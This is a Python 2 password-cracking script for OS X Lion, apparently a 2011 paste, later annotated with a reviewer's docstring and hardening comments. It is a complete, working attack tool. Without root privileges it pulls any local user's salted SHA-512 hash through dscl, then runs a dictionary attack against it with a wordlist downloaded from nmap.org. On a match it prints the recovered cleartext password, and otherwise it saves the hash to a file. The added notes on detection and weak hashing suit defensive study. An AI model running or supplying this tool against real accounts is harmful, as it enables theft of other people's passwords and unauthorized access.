defenceindepth

OS X Lion Password Cracker

Sep 18th, 2011
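##########################################
#* OS X Lion 10.7 Password Cracker
#* UID 0 NOT required
#*
#* Usage:
#* python lion_crack.py [username] [dictionary]
#*
#*
#* Patrick Dunstan
#* Sep 18, 2011
#* http://www.defenceindepth.net
#*
###########################################
"""Dictionary check of a local OS X Lion 10.7 account's ShadowHashData.

What the script does, step by step:

1. Runs ``dscl localhost -read /Search/Users/<username>`` and takes the
   line that follows ``dsAttrTypeNative:ShadowHashData``.
2. Slices an 8-hex-character (4-byte) salt and a 128-hex-character
   (64-byte) digest out of that blob, at offsets chosen by the blob length.
3. For each candidate word, computes ``sha512(salt + word)`` once and
   compares it with the stored digest.

Points a reviewer or defender should take from it:

* The header states that UID 0 is not required, i.e. the directory service
  hands password-hash material to an unprivileged local caller. Whether a
  given host still answers this query depends on its patch level; confirm
  against the vendor's security notes.
* The stored value is a single SHA-512 pass over a 4-byte salt plus the
  password. That is cheap to compute, so resistance to offline guessing
  rests almost entirely on password quality rather than on the hash.
* The observable on the host is an unprivileged process invoking ``dscl``
  with ``-read`` against a user record, which process-execution logging
  can surface.

The code is Python 2 (``urllib2``, byte-string hashing). The slice offsets
are reproduced unchanged from the original listing and are not verified here.
"""
from subprocess import *
import hashlib
import os
import urllib2
import sys
from string import *

# Fetched over plain HTTP with no integrity check. The content is only
# hashed and compared, never executed.
link = "http://nmap.org/svn/nselib/data/passwords.lst" # Online password file
defaultuser = False
username = ""


def check(password):
    """Hash one candidate with the extracted salt and compare it to the target.

    Reads the module-level ``salt_bytes``, ``stored_hash`` and ``username``,
    which the script sets before the first call. Entries starting with
    ``#!`` are treated as word-list comments and skipped. On a match the
    cleartext is printed and the process exits with status 0.
    """
    if password.startswith("#!"):  # Ignore comments
        return

    guess = hashlib.sha512(salt_bytes + password).hexdigest()
    # Every candidate, and any match, goes to stdout and therefore into
    # terminal scrollback or any log capturing it.
    print("Trying... " + password)

    if guess == stored_hash:
        print("Cleartext password for user '"+username+"' is : "+password)
        sys.exit(0)


if len(sys.argv) < 2:
    print("No username given. Defaulting to current user.")
    defaultuser = True
else:
    username = sys.argv[1]

# Argument lists instead of shell=True: nothing here is parsed by a shell.
p = Popen(["whoami"], stdout=PIPE)
whoami = p.communicate()[0]

if defaultuser:
    username = whoami.rstrip()

# The name becomes part of a directory-service path and of an output file
# name, so refuse anything that could change either path.
if not username or "/" in username:
    print("Invalid username.")
    sys.exit(1)

p = Popen(["dscl", "localhost", "-read", "/Search/Users/" + username], stdout=PIPE)
dscl_out = p.communicate()[0]

lines = dscl_out.split("\n")

digest = None
for pos, item in enumerate(lines): # extract digest
    if "dsAttrTypeNative:ShadowHashData" in item and pos + 1 < len(lines):
        digest = lines[pos+1].replace(" ", "")

if digest is None:
    # Previously this fell through to a NameError on `digest`.
    print("No ShadowHashData attribute returned for user '"+username+"'.")
    sys.exit(1)

if len(digest) == 262: # Out of box configuration
    salt = digest[56:64]
    stored_hash = digest[64:192]
elif len(digest) == 314: # SMB turned on
    print("SMB is on")
    salt = digest[104:112]
    stored_hash = digest[112:240]
elif len(digest) == 1436: # Lion Server
    salt = digest[176:184]
    stored_hash = digest[176:304]
elif len(digest) == 1492: # Lion Server with SMB
    salt = digest[224:232]
    stored_hash = digest[232:360]
else:
    # Previously this fell through to a NameError on `salt`.
    print("Unrecognised ShadowHashData length: " + str(len(digest)))
    sys.exit(1)

print("SALT : " + salt)
print("HASH : " + stored_hash)

# The salt is printed as 8 hex characters; hashing needs the 4 raw bytes.
salt_bytes = "".join(chr(int(salt[i:i+2], 16)) for i in range(0, 8, 2))

if len(sys.argv) == 3: # If dictionary file specified
    print("Reading from dictionary file '"+sys.argv[2]+"'.")
    check(whoami.rstrip())
    # `with` closes the file even when check() exits on a match.
    with open(sys.argv[2], "r") as passlist:
        for line in passlist:
            check(line.rstrip())

else: # No dictionary file specified
    print("No dictionary file specified. Defaulting to hard coded link.")

    passlist = urllib2.urlopen(link) # Download dictionary file
    try:
        passwords = passlist.read().split("\n")
    finally:
        passlist.close()
    print("\nPassword list successfully read")

    passwords.append(whoami.rstrip())

    print("\nCracking...")
    for password in passwords:
        check(password)

# Save hash for later
# The file holds credential material, so create it owner-read/write only
# rather than with the process's default permissions.
print("\nSaving hash to "+username+".hash...")
fd = os.open(username + ".hash", os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
with os.fdopen(fd, "w") as out:
    out.write(salt + stored_hash)

print("\nPassword not found. Try another dictionary.\n")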